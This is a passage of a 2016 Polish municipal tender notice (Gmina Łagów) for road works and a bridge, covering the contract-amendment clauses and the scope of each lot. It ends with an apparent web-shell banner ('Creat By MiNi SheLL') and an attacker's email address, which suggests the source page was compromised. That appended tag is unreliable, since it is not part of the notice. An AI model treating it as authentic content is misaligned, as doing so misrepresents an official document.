4.	Zamawiający dopuszcza - jeżeli uzna za uzasadnione - zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy w szczególnie uzasadnionych przypadkach, a konieczność takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego.
5.	Zmiana umowy może nastąpić na uzasadniony wniosek Wykonawcy z przyczyn od niego niezależnych, których nie mógł przewidzieć na etapie składania ofert, w następujących przypadkach
1)	zmiana osób wyznaczonych do pełnienia funkcji, jak tez powołania nowych w przypadku:
a.	śmierci, 
b.	rozwiązania stosunku pracy, 
c.	utarty uprawień niezbędnych do wykonywania funkcji w ramach niniejszego zamówienia, 
d.	choroby, urlopu wypoczynkowego osób wyznaczonych do realizacji zamówienia na czas urlopu, 
e.	innych zdarzeń losowych zaistniałych z przyczyn niezależnych od Zamawiającego oraz Wykonawcy, skutkujących obiektywna niemożliwością pełnienia funkcji przez daną osobę, wynikających z okoliczności, których mimo zachowania  należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenia zamówienia publicznego.
Zmiana osób wyznaczonych do pełnienia funkcji, jat tez powołania nowych, będzie możliwa na uzasadniony obiektywnymi okolicznościami wniosek wykonawcy po zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w siwz, co oznacza, że kwalifikacje nowo wprowadzonych osób musza być takie same albo wyższe od kwalifikacji personelu wskazanego w ofercie. 
2)	zmiana terminu - zakończenia realizacji przedmiotu zamówienia ustalonego w umowie, który może ulec zmianie w przypadku wystąpienia niżej wymienionych okoliczności, pod warunkiem, że mają one wpływ na termin realizacji całego przedmiotu umowy. Okoliczności skutkujące zmianą terminu mogą wynikać z:
a)	w przypadku przedłużania się procedury wyboru najkorzystniejszej oferty, 
b)	w przypadku wyrażenia zgody przez właściwą instytucję na przedłużenie okresu realizacji projektu, 
c)	przestojów i opóźnień zawinionych przez Zamawiającego,
d)	błędy w zinwentaryzowanych obiektach mające wpływ na realizację robót;
e)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne),
f)	warunków atmosferycznych uniemożliwiających lub utrudniających wykonywanie robót -  fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
g)	ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody w gruncie lub w budynku,
h)	zmiany będące następstwem działania organów administracji, w szczególności: przekroczenie zakreślonych przez prawo terminów wydawania przez te organy administracyjnych decyzji, zezwoleń, itp. odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń uzgodnień na skutek błędów w dokumentacji projektowej,
i)	zmiana terminu zakończenia robót budowlanych wynikających z konieczności dokonania zmian projektowych w projekcie na podstawie, którego realizowany jest przedmiot zamówienia,
j)	 zmiana terminu zakończenia robót wynikających z wykonania robót zamiennych, dodatkowych i uzupełniających oraz zmiana wynagrodzenia za wykonane prace (zgodnie z ustawą Prawo zamówień publicznych),
k)	w przypadku konieczności zaspokojenia roszczeń osób trzecich- w tym grup społecznych lub zawodowych nieartykułowanych lub niemożliwych do jednoznacznego określenia przed wszczęciem postępowania,  
W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała. Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości.

3)	zakresu umowy - powodem wprowadzenia zmian w zakresie umowy mogą być roboty zamienne lub zaniechane:
a)	są korzystne dla zamawiającego na etapie realizacji umowy lub przyniosą korzystne skutki w trakcie eksploatacji przedmiotu umowy, 
b)	pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji projektowej, pozwalają na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu umowy, przyśpieszenie terminu realizacji umowy, 
c)	 dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych w momencie zawarcia umowy.
d)	Podstawą określenia  wynagrodzenia za roboty zamienne będzie protokół konieczności  uzgodniony przez strony oraz kosztorys różnicowy Sporządzony przez wykonawcę metodą szczegółową lub uproszczoną (wg wyboru Zamawijącego), przy czym w przypadku wykonywania robót według nowej technologii cena robót zostanie obliczona w sposób następujący: parametry kosztowe będą tożsame z wielkością tych składników cenowych zawartych w kosztorysie ofertowym Wykonawcy, ceny materiałów i sprzętu zostaną ustalone według cen uzgodnionych i udokumentowanych z Inwestorem. Tak sporządzony kosztorys różnicowy będzie stanowił podstawę zmiany wynagrodzenia Wykonawcy.
e)	Wprowadzenie robót zamiennych nie może spowodować zwiększenia wysokości wynagrodzenia  ryczałtowego z tytułu realizacji przedmiotu zamówienia.
f)	Roboty zamienne mogą zostać wykonane wyłącznie na podstawie uprzednio sporządzonego protokołu konieczności, podpisanego przez kierownika budowy i inspektora nadzoru oraz zatwierdzonego przez Zamawiającego.
g)	Wynagrodzenie wykonawcy za roboty zamienne zostanie ustalone na podstawie cen jednostkowych i wskaźników cenotwórczych wyszczególnionych w kosztorysie ofertowym sporządzonym przez Wykonawcę dla tych robót oraz ilości faktycznie wykonanych przez Wykonawcę  i odebranych przez Zamawiającego  robót zamiennych. Podstawą odbioru robót zamiennych będzie obmiar robót wraz z wyceną kosztorysową sporządzoną przez Wykonawcę.
h)	zmiana zakresu umowy na skutek rezygnacji z robót zaniechanych jest możliwe jeśli konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy. Przez roboty zaniechane rozumie się roboty objęte pierwotna dokumentacją projektową, a których wykonanie stało się zbędne. Podstawa określenia wynagrodzenia za roboty zaniechane będzie protokół konieczności uzgodniony przez strony oraz kosztorys sporządzony przez Wykonawcę, tj. określający ilość jednostek obmiarowych zakresu robót podlegających zaniechaniu pomnożony przez cenę jednostkowa wynikającą z kosztorysu ofertowego, stanowiącego podstawę obliczenia ceny w ofercie. Tak sporządzony kosztorys po uprzednim jego sprawdzeniu i zatwierdzeniu przez Inwestora, będzie stanowił podstawę zmiany wynagrodzenia Wykonawcy. Wartość robót zaniechanych skutkuje odpowiednim zmniejszeniem wynagrodzenia Wykonawcy.
i)	zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. 
4) zmiany podwykonawców:
a) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłuży się podwykonawca doprowadzi do skrócenia czasu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu zamówienia bardziej zaawansowanych rozwiązań technologicznych w porównaniu do skazanych w siwz, 
b) Zmiana podwykonawcy lub rezygnacja z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zmian może nastąpić wyłącznie po przedstawieniu przez wykonawcę oświadczenia p[podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec wykonawcy z tytułu realizacji  umowy. Jeżeli zmian dotyczy podmiotu trzeciego , na zasobach, którego wykonawca opierał się wskazując spełnienie warunków udziału w postępowaniu, zamawiający dopuścił ziaje pod warunkiem, że nowy podwykonawca wykaże spełnienie warunków w zakresie ni mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia publicznego przez dotychczasowego podwykonawcę. 

5)	zmian w stosunku do dokumentacji projektowej:
a)	na wniosek Wykonawcy, za zgoda Zamawiającego w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane przez Wykonawcę rozwiązanie jest równoważne lub lepsze funkcjonalnie od tego, jaki przewiduje projekt. W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami. Projekt ten wymaga akceptacji ze strony nadzoru autorskiego. I zatwierdzenia do realizacji przez Zamawiającego. Koszty związany z uzyskaniem akceptacji nadzoru autorskiego ponosi Wykonawca.
b)	z punktu widzenia Zamawiającego zachodzi potrzeba zmian rozwiązań technicznych wynikających z umowy, Zamawiający sporządza protokół konieczności, a następnie dostarcza dokumentacje projektową na te roboty wraz ze zleceniem ich wykonania
6)	zmiana kwoty wynagrodzenia Wykonawcy zgodnie z art. 142 ust. 5 ustawy  w przypadku: zmiany stawki podatku VAT, wysokości minimalnego  wynagrodzenia za pracę, zasad podlegania ubezpieczeniom społecznym i zdrowotnym lub wysokości stawki  składki na ubezpieczenie społeczne lub zdrowotne., jeżeli zmiany te będą miały wpływ  na koszty wykonania zamówienia przez Wykonawcę.  Jeżeli w trakcie realizacji umowy nastąpi zmiana stawki podatku VAT dla robót objętych przedmiotem zamówienia, strony dokonają odpowiedniej zmiany wynagrodzenia umownego, 
7)	zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy, 
8)	zmiany dotyczące nazwy , siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz  innych danych identyfikacyjnych, 
9)	zmiany i modyfikacje w harmonogramie rzeczowo  -finansowym projektu z uwzględnieniem konsekwencji finansowych z tego tytułu
6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lagowgmina.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Łagowie, ul. Rynek 62, 26-025 Łagów pokój nr 54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 10:00, miejsce: Urząd Gminy w Łagowie, ul. Rynek 62, 26-025 Łagów pokój nr 24 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie wniosków o przyznanie pomocy na operacje typu Budowa lub modernizacja dróg lokalnych w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii objętego Programem Rozwoju Obszarów Wiejskich na lata  2014-2020 z udziałem środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich (EFRROW). W związku z powyższym Zamawiający zastrzega sobie możliwość ograniczenia zakresu rzeczowego w przypadku nie uzyskania dofinansowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Przebudowa drogi gminnej Wola Łagowska- Pustka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi obejmuje wykonanie nawierzchni asfaltowej na długości 640 m o szerokości 5,0 m i obustronnych poboczach 0,5 m, a szczególności:
- wykonanie warstwy odsączającej z piasku gr. 20 cm,
- wykonanie podbudowy kamiennej kruszywem niezwiązanym o gr. 20 cm, 
- wzmocnienie istniejącej podbudowy tłuczniowej warstwa kruszywa gr. 15 cm, 
- wykonanie warstwy wiążącej z masy mineralno-asfaltowej gr. 4 cm, 
- wykonanie warstwy ścieralnej z masy mineralno-asfaltowej gr. 4 cm, 
- wykonanie poboczy utwardzonych materiałem kamiennym gr. 10 cm o szerokości 0,5 m, 
- odmulenie rowów,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji i rekojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	W ramach zadanie zostanie wykonany most drogowy z obustronnymi dojazdami i infrastrukturą towarzyszącą zlokalizowany w ciągu drogi gminnej Nowy Staw- Winna. Most drogowy o konstrukcji żelbetowej jednoprzęsłowy, fundamentowanie bezpośrednie, stopy żelbetowe, przyczółki żelbetowe, układ nośny w postaci ustroju, płytowego, żelbetowego, balustrady stalowe. Adaptacja niwelety i nawierzchni jezdni na dojazdach wystąpi na odcinku ok. 30 m po obu stronach mostu. Zabezpieczenie nasypów budowlanych przewiduje się poprzez skarpy o nachyleniu 1:1 zabezpieczone geokratami obsiane trawą. Zabezpieczenie stożków mostu, betonowane bezpośrednio na budowie. Odprowadzenie wód opadowych- poprzez system spadków poprzecznych i podłużnych oraz odwodnienie liniowe do rowów przydrożnych, a następnie odprowadzone zostaną do rzeki. Regulacja i pogłębienie koryta rzeki przeprowadzona zostanie na odcinku 20 m powyżej i poniżej istniejącego mostu. Po wykonaniu robót ziemnych przewiduje się zabezpieczenia brzegów i dna rzeki materiałami naturalnymi w postaci narzutów. Obiekt jedno jezdniowy o jednym pasie ruchu nawiązujący do istniejących parametrów drogi gminnej.
b)	Charakterystyczne parametry techniczne mostu:
- ilość przęseł: jedno przęsło, 
- długość konstrukcyjna przęsła: 13,50 m, 
- długość całkowita mostu, 23,40 m, 
-szerokość użytkowa mostu: 4,50 m, 
- szerokość całkowita 6,25 m, 
 - światło pionowe 1,75-1,9 m, 
-światło poziome: 12,90 m
c) Ramowy zakres robót budowlanych obejmuje:
- przygotowanie i zabezpieczenie terenu budowy, 
- frezowanie i utylizacja istniejących warstw asfaltu, 
- roboty rozbiórkowe istniejącej podbudowy drogi, 
- roboty ziemne i zabezpieczające wykopy, 
- roboty fundamentowe- stropy żelbetonowe (podstawy) przyczółków, 
- roboty żelbetonowe konstrukcji nośnych mostu- konstrukcja żelbetonowa przyczółków i płyty mostowej, 
- wykonanie izolacji pionowych i poziomych oraz układu odwodnienia mostu, 
- budowa nasypów wraz z umocnienie dojazdów mostu, 
- budowa konstrukcji drogowych dojazdów, 
 - regulacja i umocnienie koryta rzeki, 
- wykonanie prac wykończeniowych mostu montaż balustrad, malowanie, 
- wykonanie umocnienia stożków, 
- rozbiórka istniejącej kładki, 
- wykonanie prac porządkowych terenu inwestycji,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji i rekojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Remont drogi Radostów- Choiny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont drogi obejmuje: wykonanie remontu drogi o nawierzchni asfaltowej szerokości jezdni 3,5 m wraz z poboczami z kruszywa (szerokość poboczy 0,75 m) w km 0+000 do 1+650, a w szczególności:
- profilowanie, ścinanie i zagęszczanie istniejącej nawierzchni, 
- podbudowa z kruszywa 10 cm, 
- warstwa wiążąca z betonu asfaltowego 5 cm,
- warstwa ścieralna z betonu asfaltowego 4 cm, 
Przedmiotowa droga realizowana jest na podstawie porozumienia zawartego pomiędzy Gmina Łagów a Gmina Raków z dnia 01.10.2015r. ( do wglądu w siedzibie Zamawiającego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com